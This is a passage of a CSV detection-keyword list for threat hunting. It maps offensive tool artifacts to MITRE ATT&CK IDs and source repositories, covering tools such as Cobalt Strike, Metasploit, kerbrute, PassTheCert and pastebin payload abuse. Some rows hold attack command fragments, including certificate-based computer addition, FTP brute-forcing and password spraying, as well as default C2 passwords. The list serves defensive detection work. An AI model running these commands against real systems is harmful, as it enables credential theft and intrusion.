?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PassTheCert.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PassTheChallenge.cpp*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.exe*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.pdb*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.sln*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation 
tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PassTheChallenge.vcxproj*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,1,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*passthehashbrowns/BOFMask*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*passware-kit-forensic.sls*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PasswareKitForensic_*_Setup.dmg*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PasswareKitForensic_*_Setup.msi*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential 
Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passware-kit-forensic-64bit.msi*,offensive_tool_keyword,Passware Kit Forensic,Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.passware.com/kit-forensic/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passwd*john*,greyware_tool_keyword,passwd,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*password = 'tdragon6'*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*Password*Winter2017*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*password_box.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*password_cracker.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*password_crackers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Password_Cracking.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*password_prompt_spoof.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*password|passwort|passwd|*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*PasswordBoxImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Password-Default/service.txt*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*passwordfox.exe*,offensive_tool_keyword,passwordfox,PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/passwordfox.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passwordfox.zip*,offensive_tool_keyword,passwordfox,PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/passwordfox.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passwordfox-x64.zip*,offensive_tool_keyword,passwordfox,PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. 
PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/passwordfox.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Passwords/Leaked-Databases*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Passwords_in_description.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Password-Scripts*,offensive_tool_keyword,Password-Scripts,Password Scripts xploitation ,T1210 - T1555 - T1110 - T1554 - T1553,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/laconicwolf/Password-Scripts,1,0,N/A,N/A,1,98,37,2019-10-08T17:57:49Z,2017-10-20T17:17:23Z -*PasswordSpray *,offensive_tool_keyword,DomainPasswordSpray,DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. 
BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!,t1110 - T1114 - T1555,TA0006 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/dafthack/DomainPasswordSpray,1,1,N/A,N/A,10,1498,354,2023-09-22T22:13:14Z,2016-10-04T23:37:37Z -*passwordspray*--user-as-pass*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*passwordspray.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*passwordSprayCmd*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*pastebin.com*/raw/* ,greyware_tool_keyword,pastebin,pastebin raw access content - abused by malwares to retrieve payloads,T1119,TA0009,Redline Stealer,N/A,Collection,pastebin.com,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pastebin.com*/rw/*,greyware_tool_keyword,pastebin,pastebin raw access content - abused by malwares to retrieve payloads,T1119,TA0009,Redline Stealer,N/A,Collection,pastebin.com,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pastebin.com*api/api_post.php*,greyware_tool_keyword,pastebin,pastebin POST url - abused by malwares to exfiltrate informations,T1102 - T1048 - T1094 - T1608.001,TA0011,N/A,N/A,Data Exfiltration,pastebin.com,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pasv and port both active*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation 
Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*patator ftp_login host=* user=FILE0 0=*.txt *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*patator*,offensive_tool_keyword,patator,Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.,T1110 - T1111 - T1210 - T1558.004,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/lanjelot/patator,1,0,N/A,N/A,10,3284,776,2023-09-25T06:06:20Z,2014-08-25T00:56:21Z -*Patch-AMSI.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*patchAmsiOpenSession*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectAmsiBypass,1,1,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*Patch-ETW.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*Pateensy/PaensyLib/*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*--path docToDump.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*path_dll_hijack.h*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,0,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*pathhijack.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*PaulSec/twittor*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*PayGen*python3 generate.py*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,0,N/A,N/A,,N/A,,, -*payload start tetanus*,offensive_tool_keyword,tetanus,Mythic C2 agent targeting Linux and Windows hosts written in Rust,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://github.com/MythicAgents/tetanus,1,0,N/A,N/A,3,229,33,2023-05-14T21:34:20Z,2022-03-07T20:35:33Z -*payload.c *,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*payload.csproj*,offensive_tool_keyword,scshell,network pentestration test (shell),T1071.001 - T1071.004 - T1046 - T1059 - T1024,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,N/A,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*payload.sct *,offensive_tool_keyword,scshell,network pentestration test (shell),T1071.001 - T1071.004 - T1046 - T1059 - T1024,TA0002 - TA0003 - TA0007,N/A,N/A,POST 
Exploitation tools,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,N/A,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*payload/encryptor_remote.py*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*payload_bootstrap_hint*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*payload_creator.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation 
tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*payload_encryption.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*payload_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*payload_local*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*payload_msf.c*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
